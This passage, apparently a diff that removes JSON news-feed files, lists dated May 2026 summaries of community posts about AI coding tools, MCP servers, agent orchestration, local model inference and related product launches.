structure (\"if the agent calls X, the trace must satisfy Y\"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express \"tests must pass before commit\", \"no two writes to the same file in a session\", or \"max N file edits per session\", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa…", - "category": "ai_tools" - }, - { - "title": "Built an MCP server so Claude can generate music, images, and video natively. One config block.", - "url": "https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-26T19:14:33.000Z", - "summary": "I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \\- aw\\_generate\\_music (Suno, full songs with lyrics or instrumental) \\- aw\\_generate\\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \\- aw\\_generate\\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\\~/.config/claude/mcp.json or wherever yours lives): { \"mcpServers\": { \"aetherwave\": { \"command\": \"npx\", \"args\": \\[\"-y\", \"@aetherwave-studio/mcp\"\\], \"env\": { \"AW\\_API\\_KEY\": \"aw\\_live\\_YOUR\\_KEY\\_HERE\" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. \"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin…", - "category": "ai_tools" - }, - { - "title": "Small set of local MCP server installers for home Linux users", - "url": "https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-26T14:39:11.000Z", - "summary": "Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \\`/mcp\\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \\`8001-80…", - "category": "ai_models" - }, - { - "title": "Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode", - "url": "https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-26T14:34:19.000Z", - "summary": "I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you!", - "category": "ai_models" - }, - { - "title": "This is insane.", - "url": "https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-26T13:28:34.000Z", - "summary": "Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every \"context layer\" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti…", - "category": "ai_tools" - }, - { - "title": "Find where claude code burns your tokens", - "url": "https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-26T15:32:11.000Z", - "summary": "I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts", - "category": "ai_tools" - }, - { - "title": "Anyone else dread keeping web, Android, and iOS releases in sync?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-26T00:37:17.000Z", - "summary": "I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \\- bump the right versions/build numbers both in build and in game ui \\- create patch notes for every supported language \\- run lint/typecheck/build through \\`npm run verify\\` \\- sync Capacitor after the web build \\- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \\- build an Android AAB and upload it to Google Play \\-…", - "category": "ai_tools" - }, - { - "title": "Claude makes documents into apps", - "url": "https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "tool_update", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-26T15:35:15.000Z", - "summary": "# Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume…", - "category": "ai_tools" - }, - { - "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models", - "url": "https://www.digg.com/ai/5nn022fp?rank=3", - "source": "Digg AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-26T15:24:13.377Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks", - "url": "https://www.digg.com/ai/5nn022fp", - "source": "Digg AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-26T15:24:13.366Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better", - "url": "https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-26T13:41:20.000Z", - "summary": "i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \\~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on…", - "category": "ai_tools" - }, - { - "title": "I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.", - "url": "https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-26T13:01:47.000Z", - "summary": "I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo…", - "category": "ai_tools" - }, - { - "title": "Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!", - "url": "https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-26T08:41:48.000Z", - "summary": "The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d…", - "category": "ai_tools" - }, - { - "title": "Finally tested an AI video tool that works directly in Claude without setup", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-26T05:19:37.000Z", - "summary": "Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi…", - "category": "ai_tools" - }, - { - "title": "Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event", - "url": "https://x.com/Scobleizer/status/2057868124112982526", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-26T02:23:28.350Z", - "summary": "Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-27.json b/data/news-feed-2026-05-27.json deleted file mode 100644 index 19b3519..0000000 --- a/data/news-feed-2026-05-27.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.008Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-27", - "article_count": 15, - "archived_story_count": 680, - "articles": [ - { - "title": "MarkdownAI v2.0, its a workflow engine, not a template parser", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-27T21:42:18.000Z", - "summary": "MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl…", - "category": "ai_tools" - }, - { - "title": "I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T14:09:26.000Z", - "summary": "Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every \"player\" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d…", - "category": "ai_models" - }, - { - "title": "Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T09:20:45.000Z", - "summary": "been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = \"atlas\" default_model = \"deepseek-ai/deepseek-v4-flash\" [[ custom_providers ]] name = \"atlas\" base_url = \"https://api.atlascloud.ai/v1\" api_key_env = \"ATLAS_API_KEY\" model = \"deepseek…", - "category": "ai_models" - }, - { - "title": "I built a tool that lets your AI assistant test your entire app in a real browser", - "url": "https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-27T02:55:55.000Z", - "summary": "So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant \"test the login flow\" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing)", - "category": "ai_tools" - }, - { - "title": "Anthropic just confirmed why 90% of non-coding AI agents fail in production", - "url": "https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T20:11:57.000Z", - "summary": "Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *\"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet.\"* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. * Why the Rest of the World is Hard: A sales or marketing agent doesn’t…", - "category": "ai_tools" - }, - { - "title": "[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]", - "url": "https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/", - "source": "Reddit r/MachineLearning", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T17:02:55.000Z", - "summary": "I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/)", - "category": "ai_research" - }, - { - "title": "Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T14:54:45.000Z", - "summary": "I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \\- I want to build a inference endpoint that can handle up to 30 users. \\- I want a fairly reasonable big context, say 131,072-262,144. \\- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \\- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \\- If running on llama.cpp I would probably use UD-Q6\\_K\\_XL or UD-Q8\\_K\\_XL quant from Unsloth. \\- If running on vllm I have no idea on what quant to use? Some advice here would be great. \\- Is there any good tool to benchmark \"concurrent users\"?", - "category": "ai_models" - }, - { - "title": "litellm vs any-llm (otari)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T14:09:07.000Z", - "summary": "I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences", - "category": "ai_models" - }, - { - "title": "Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets", - "url": "https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T10:05:58.000Z", - "summary": "Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c…", - "category": "ai_tools" - }, - { - "title": "Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.78, - "date": "2026-05-27T16:57:57.000Z", - "summary": "Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. \"This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from \"fixing\" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then…", - "category": "ai_tools" - }, - { - "title": "Millions of AI agents imperiled by critical vulnerability in open source package", - "url": "https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/", - "source": "Ars Technica AI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-05-27T05:18:30.012Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-27T23:24:48.000Z", - "summary": "I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \\- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY)", - "category": "ai_models" - }, - { - "title": "BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]", - "url": "https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-27T21:53:42.000Z", - "summary": "\\[R\\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 